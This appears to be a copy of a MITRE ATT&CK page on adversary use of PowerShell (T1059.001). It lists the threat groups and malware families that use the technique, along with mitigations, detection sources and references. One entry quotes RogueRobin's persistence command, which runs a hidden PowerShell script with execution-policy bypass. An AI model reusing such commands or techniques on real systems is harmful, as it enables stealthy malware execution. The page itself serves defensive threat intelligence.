Skip to content

T1059.001 PowerShell

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.7 Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.4

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell’s underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).821

Item Value
ID T1059.001
Sub-techniques T1059.001, T1059.002, T1059.003, T1059.004, T1059.005, T1059.006, T1059.007, T1059.008, T1059.009
Tactics TA0002
Platforms Windows
Version 1.3
Created 09 March 2020
Last Modified 27 March 2023

Procedure Examples

ID Name Description
C0025 2016 Ukraine Electric Power Attack During the 2016 Ukraine Electric Power Attack, Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.204
S0677 AADInternals AADInternals is written and executed via PowerShell.13
S0622 AppleSeed AppleSeed has the ability to execute its payload via PowerShell.132
G0073 APT19 APT19 used PowerShell commands to execute payloads.175
G0007 APT28 APT28 downloads and executes PowerShell scripts and performs PowerShell commands.136137138
G0016 APT29 APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke.116190191192
G0022 APT3 APT3 has used PowerShell on victim systems to download and run payloads after exploitation.215
G0050 APT32 APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.20921050
G0064 APT33 APT33 has utilized PowerShell to download files from the C2 server and run various scripts. 211212
G0082 APT38 APT38 has used PowerShell to execute commands and other operational tasks.199
G0087 APT39 APT39 has used PowerShell to execute malicious code.217218
G0096 APT41 APT41 leveraged PowerShell to deploy malware families in victims’ environments.134135
G0143 Aquatic Panda Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.177
S0129 AutoIt backdoor AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader.93
S0234 Bandook Bandook has used PowerShell loaders as part of execution.120
S0534 Bazar Bazar can execute a PowerShell script received from C2.9596
S1070 Black Basta Black Basta has used PowerShell scripts for discovery and to execute files over the network.565857
S0521 BloodHound BloodHound can use PowerShell to pull Active Directory information from the target environment.12
G0108 Blue Mockingbird Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.226
S0360 BONDUPDATER BONDUPDATER is written in PowerShell.2930
G0060 BRONZE BUTLER BRONZE BUTLER has used PowerShell for execution.233
S1039 Bumblebee Bumblebee can use PowerShell for execution.48
C0018 C0018 During C0018, the threat actors used encoded PowerShell scripts for execution.256255
C0021 C0021 During C0021, the threat actors used obfuscated PowerShell to extract an encoded payload from within an .LNK file.247248
S0674 CharmPower CharmPower can use PowerShell for payload execution and C2 communication.46
G0114 Chimera Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.178179
S0660 Clambling The Clambling dropper can use PowerShell to download the malware.82
G0080 Cobalt Group Cobalt Group has used powershell.exe to download and execute scripts.239238237236235234
S0154 Cobalt Strike Cobalt Strike can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.7875 Cobalt Strike can also use PowerSploit and other scripting frameworks to perform execution.74777679
S0126 ComRAT ComRAT has used PowerShell to load itself every time a user logs in to the system. ComRAT can execute PowerShell scripts loaded into memory or from the file system.112113
G0142 Confucius Confucius has used PowerShell to execute malicious files and payloads.225
S0591 ConnectWise ConnectWise can be used to execute PowerShell commands on target machines.18
G0052 CopyKittens CopyKittens has used PowerShell Empire.219
S0488 CrackMapExec CrackMapExec can execute PowerShell commands via WMI.19
S1023 CreepyDrive CreepyDrive can use Powershell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.49
S1024 CreepySnail CreepySnail can use PowerShell for execution, including the cmdlets Invoke-WebRequst and Invoke-Expression.49
S0625 Cuba Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.106
G0079 DarkHydrus DarkHydrus leveraged PowerShell to download and execute additional scripts for execution.98193
G0105 DarkVishnya DarkVishnya used PowerShell to create shellcode loaders.220
S0673 DarkWatchman DarkWatchman can execute PowerShell commands and has used PowerShell to execute a keylogger.131
G0009 Deep Panda Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.176
S0354 Denis Denis has a version written in PowerShell.50
S0695 Donut Donut can generate shellcode outputs that execute via PowerShell.17
S0186 DownPaper DownPaper uses PowerShell for execution.114
G0035 Dragonfly Dragonfly has used PowerShell scripts for execution.213214
G1006 Earth Lusca Earth Lusca has used PowerShell to execute commands.198
S0554 Egregor Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.62
G1003 Ember Bear Ember Bear has used PowerShell to download and execute malicious code.70
S0367 Emotet Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz. 3940414243
S0363 Empire Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module.1415
S0512 FatDuke FatDuke has the ability to execute PowerShell scripts.73
S0679 Ferocious Ferocious can use PowerShell scripts for execution.90
G0051 FIN10 FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.17314
G0037 FIN6 FIN6 has used PowerShell to gain access to merchant’s networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.227228229
G0046 FIN7 FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.71187188
G0061 FIN8 FIN8‘s malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access.240242241
S0381 FlawedAmmyy FlawedAmmyy has used PowerShell to execute commands.121
G0117 Fox Kitten Fox Kitten has used PowerShell scripts to access credential data.156
C0001 Frankenstein During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.252
G0093 GALLIUM GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.206
G0084 Gallmaker Gallmaker used PowerShell to download additional payloads and for execution.140
G0047 Gamaredon Group Gamaredon Group has used obfuscated PowerShell scripts for staging.117
G0115 GOLD SOUTHFIELD GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.142
G0078 Gorgon Group Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.141
S0417 GRIFFON GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.119
G0125 HAFNIUM HAFNIUM has used the Exchange Power Shell module Set-OabVirtualDirectoryPowerShell to export mailbox data.196197
S0151 HALFBAKED HALFBAKED can execute PowerShell scripts.71
S0037 HAMMERTOSS HAMMERTOSS is known to use PowerShell.52
S0499 Hancitor Hancitor has used PowerShell to execute commands.61
S0170 Helminth One version of Helminth uses a PowerShell script.92
G1001 HEXANE HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.186184185
G0100 Inception Inception has used PowerShell to execute malicious commands and payloads.55195
G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware.222223
S0389 JCry JCry has used PowerShell to execute payloads.44
S0648 JSS Loader JSS Loader has the ability to download and execute PowerShell scripts.94
S0387 KeyBoy KeyBoy uses PowerShell commands to download and execute payloads.101
S0526 KGH_SPY KGH_SPY can execute PowerShell commands on the victim’s machine.51
G0094 Kimsuky Kimsuky has executed a variety of PowerShell scripts.180182181183
S0250 Koadic Koadic has used PowerShell to establish persistence.16
S0669 KOCTOPUS KOCTOPUS has used PowerShell commands to download additional files.16
S0356 KONNI KONNI used PowerShell to download and execute a specific 64-bit version of the malware.110111
G0032 Lazarus Group Lazarus Group has used PowerShell to execute commands and malicious code.174
G0140 LazyScripter LazyScripter has used PowerShell scripts to execute malicious code.16
G0065 Leviathan Leviathan has used PowerShell for execution.200201202203
S0680 LitePower LitePower can use a PowerShell script to execute commands.90
S0681 Lizar Lizar has used PowerShell scripts.45
S0447 Lokibot Lokibot has used PowerShell commands embedded inside batch scripts.127
S1060 Mafalda Mafalda can execute PowerShell commands on a compromised machine.129
G0059 Magic Hound Magic Hound has used PowerShell for execution and privilege escalation.159160158157161
G0045 menuPass menuPass uses PowerSploit to inject shellcode into PowerShell.165166
S0688 Meteor Meteor can use PowerShell commands to disable the network adapters on a victim machines.66
S0553 MoleNet MoleNet can use PowerShell to set persistence.28
G0021 Molerats Molerats used PowerShell implants on target machines.151
S0256 Mosquito Mosquito can launch PowerShell Scripts.64
G0069 MuddyWater MuddyWater has used PowerShell for execution.1481501441496714314714654145
G0129 Mustang Panda Mustang Panda has used malicious PowerShell scripts to enable execution.162163
S0457 Netwalker Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.107108
S0198 NETWIRE The NETWIRE binary has been executed via PowerShell script.63
S0385 njRAT njRAT has executed PowerShell commands via auto-run registry key persistence.102
G0133 Nomadic Octopus Nomadic Octopus has used PowerShell for execution.246
G0049 OilRig OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.29207208
C0022 Operation Dream Job During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.253
C0014 Operation Wocao During Operation Wocao, threat actors used PowerShell on compromised systems.254
S0352 OSX_OCEANLOTUS.D OSX_OCEANLOTUS.D uses PowerShell scripts.100
G0040 Patchwork Patchwork used PowerSploit to download payloads, run a reverse shell, and execute malware on the victim’s machine.16472
S0517 Pillowmint Pillowmint has used a PowerShell script to install a shim database.86
G0033 Poseidon Group The Poseidon Group‘s Information Gathering Tool (IGT) includes PowerShell components.194
S0150 POSHSPY POSHSPY uses PowerShell to execute various commands, one to execute its payload.37
S1012 PowerLess PowerLess is written in and executed via PowerShell without using powershell.exe.34
S0685 PowerPunch PowerPunch has the ability to execute through PowerShell.117
S0441 PowerShower PowerShower is a backdoor written in PowerShell.55
S0145 POWERSOURCE POWERSOURCE is a PowerShell backdoor.8584
S0194 PowerSploit PowerSploit modules are written in and executed via PowerShell.2122
S0393 PowerStallion PowerStallion uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.88
S0223 POWERSTATS POWERSTATS uses PowerShell for obfuscation and execution.68676954
S0371 POWERTON POWERTON is written in PowerShell.124
S1046 PowGoop PowGoop has the ability to use PowerShell scripts to execute commands.54
S0184 POWRUNER POWRUNER is written in PowerShell.29
S1058 Prestige Prestige can use PowerShell for payload execution on targeted systems.65
S0613 PS1 PS1 can utilize a PowerShell loader.83
S0196 PUNCHBUGGY PUNCHBUGGY has used PowerShell scripts.97
S0192 Pupy Pupy has a module for loading and executing PowerShell scripts.23
S1032 PyDCrypt PyDCrypt has attempted to execute with PowerShell.31
S0583 Pysa Pysa has used Powershell scripts to deploy its ransomware.89
S0650 QakBot QakBot can use PowerShell to download and execute payloads.130
S0269 QUADAGENT QUADAGENT uses PowerShell scripts for execution.118
S0241 RATANKBA There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.125126
S0511 RegDuke RegDuke can extract and execute PowerShell scripts from C2 communications.73
S0379 Revenge RAT Revenge RAT uses the PowerShell command Reflection.Assembly to load itself into memory to aid in execution.128
S0496 REvil REvil has used PowerShell to delete volume shadow copies and download files.24252627
S0270 RogueRobin RogueRobin uses a command prompt to run a PowerShell script from Excel.98 To assist in establishing persistence, RogueRobin creates %APPDATA%\OneDrive.bat and saves the following string to it:powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\OneDrive.ps1”.9998
S1018 Saint Bot Saint Bot has used PowerShell for execution.70
G0034 Sandworm Team Sandworm Team has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.205204
S0053 SeaDuke SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.116
S0382 ServHelper ServHelper has the ability to execute a PowerShell script to get information from the infected host.32
S0546 SharpStage SharpStage can execute arbitrary commands with PowerShell.28122
S0450 SHARPSTATS SHARPSTATS has the ability to employ a custom PowerShell script.69
G0121 Sidewinder Sidewinder has used PowerShell to drop and execute malware loaders.221
G0091 Silence Silence has used PowerShell to download and execute payloads.243244
S0692 SILENTTRINITY SILENTTRINITY can use PowerShell to execute commands.20
S0649 SMOKEDHAM SMOKEDHAM can execute Powershell commands sent from its C2 server.38
S0273 Socksbot Socksbot can write and execute PowerShell scripts.72
C0024 SolarWinds Compromise During the SolarWinds Compromise, APT29 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.249251250
S0390 SQLRat SQLRat has used PowerShell to create a Meterpreter session.91
S1030 Squirrelwaffle Squirrelwaffle has used PowerShell to execute its payload.5960
G0038 Stealth Falcon Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.139
S0491 StrongPity StrongPity can use PowerShell to add files to the Windows Defender exclusions list.33
G0062 TA459 TA459 has used PowerShell for execution of a payload.133
G0092 TA505 TA505 has used PowerShell to download and execute malware and reconnaissance scripts.152153154155
G0139 TeamTNT TeamTNT has executed PowerShell commands in batch scripts.189
G0088 TEMP.Veles TEMP.Veles has used a publicly-available PowerShell-based tool, WMImplant.230 The group has also used PowerShell to perform Timestomping.231
G0027 Threat Group-3390 Threat Group-3390 has used PowerShell for execution.22482
G0076 Thrip Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.216
G0131 Tonto Team Tonto Team has used PowerShell to download additional payloads.245
S0266 TrickBot TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers.
123
G0010 Turla Turla has used PowerShell to execute commands/scripts, in some cases via a custom executable or code from Empire‘s PSInject.16788168 Turla has also used PowerShell scripts to load and execute malware in memory.
S0386 Ursnif Ursnif droppers have used PowerShell in download cradles to download and execute the malware’s full executable payload.87
S0476 Valak Valak has used PowerShell to download additional modules.47
S0670 WarzoneRAT WarzoneRAT can use PowerShell to download files and execute commands.3536
S0514 WellMess WellMess can execute PowerShell scripts received from C2.8081
S0689 WhisperGate WhisperGate can use PowerShell to support multiple actions including execution and defense evasion.104103105
G0090 WIRTE WIRTE has used PowerShell for script execution.232
G0102 Wizard Spider Wizard Spider has used macros to execute PowerShell scripts to download malware on victim’s machines.171 It has also used PowerShell to execute commands and move laterally through a victim network.170172169
S1065 Woody RAT Woody RAT can execute PowerShell commands and scripts with the use of .NET DLL, WoodyPowerSession.109
S0341 Xbash Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.53
S0330 Zeus Panda Zeus Panda uses PowerShell to download and execute the payload.115

Mitigations

ID Mitigation Description
M1049 Antivirus/Antimalware Anti-virus can be used to automatically quarantine suspicious files.
M1045 Code Signing Set PowerShell execution policy to execute only signed scripts.
M1042 Disable or Remove Feature or Program It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.
M1038 Execution Prevention Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., Add-Type).11
M1026 Privileged Account Management When PowerShell is necessary, consider restricting PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.10

Detection

ID Data Source Data Component
DS0017 Command Command Execution
DS0011 Module Module Load
DS0009 Process Process Creation
DS0012 Script Script Execution

References

  1. Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019. 

  2. Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018. 

  3. Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. 

  4. Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016. 

  5. Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021. 

  6. Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. 

  7. Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016. 

  8. Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018. 

  9. Microsoft. (2022, November 17). Just Enough Administration. Retrieved March 27, 2023. 

  10. Sutherland, S. (2014, September 9). 15 Ways to Bypass the PowerShell Execution Policy. Retrieved July 23, 2015. 

  11. PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023. 

  12. Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020. 

  13. Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022. 

  14. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. 

  15. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019. 

  16. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. 

  17. TheWover. (2019, May 9). donut. Retrieved March 25, 2022. 

  18. Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021. 

  19. byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020. 

  20. Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022. 

  21. PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. 

  22. PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018. 

  23. Nicolas Verdier. (n.d.). Retrieved January 29, 2018. 

  24. Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. 

  25. Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020. 

  26. Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. 

  27. Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020. 

  28. Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020. 

  29. Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. 

  30. Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019. 

  31. Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022. 

  32. Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020. 

  33. Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020. 

  34. Cybereason Nocturnus. (2022, February 1). PowerLess Trojan: Iranian APT Phosphorus Adds New PowerShell Backdoor for Espionage. Retrieved June 1, 2022. 

  35. Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021. 

  36. Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022. 

  37. Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017. 

  38. FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. 

  39. Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019. 

  40. Trend Micro. (2019, January 16). Exploring Emotet’s Activities . Retrieved March 25, 2019. 

  41. Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019. 

  42. Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019. 

  43. Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019. 

  44. Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019. 

  45. BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker’s toolkit. Retrieved February 2, 2022. 

  46. Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022. 

  47. Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020. 

  48. Salem, A. (2022, April 27). The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection. Retrieved September 2, 2022. 

  49. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022. 

  50. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018. 

  51. Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. 

  52. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. 

  53. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018. 

  54. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022. 

  55. Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020. 

  56. Gonzalez, I., Chavez I., et al. (2022, May 9). Examining the Black Basta Ransomware’s Infection Routine. Retrieved March 7, 2023. 

  57. Inman, R. and Gurney, P. (2022, June 6). Shining the Light on Black Basta. Retrieved March 8, 2023. 

  58. Trend Micro. (2022, September 1). Ransomware Spotlight Black Basta. Retrieved March 8, 2023. 

  59. Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022. 

  60. Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022. 

  61. Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020. 

  62. Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021. 

  63. Maniath, S. and Kadam P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing. Retrieved January 7, 2021. 

  64. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. 

  65. MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023. 

  66. Check Point Research Team. (2021, August 14). Indra - Hackers Behind Recent Attacks on Iran. Retrieved February 17, 2022. 

  67. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. 

  68. Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. 

  69. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020. 

  70. Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022. 

  71. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017. 

  72. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. 

  73. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. 

  74. Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017. 

  75. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020. 

  76. Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021. 

  77. Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019. 

  78. Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017. 

  79. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021. 

  80. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020. 

  81. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020. 

  82. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021. 

  83. The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021. 

  84. Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. 

  85. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. 

  86. Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey Thief . Retrieved July 27, 2020. 

  87. Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019. 

  88. Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019. 

  89. CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021. 

  90. Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022. 

  91. Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019. 

  92. Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. 

  93. Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016. 

  94. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. 

  95. Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. 

  96. Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. 

  97. Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019. 

  98. Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018. 

  99. Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019. 

  100. Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018. 

  101. Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019. 

  102. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. 

  103. Biasini, N. et al.. (2022, January 21). Ukraine Campaign Delivers Defacement and Wipers, in Continued Escalation. Retrieved March 14, 2022. 

  104. Falcone, R. et al.. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022. 

  105. S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022. 

  106. Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021. 

  107. Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020. 

  108. Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020. 

  109. MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022. 

  110. Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. 

  111. Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022. 

  112. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. 

  113. CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020. 

  114. ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. 

  115. Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018. 

  116. Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015. 

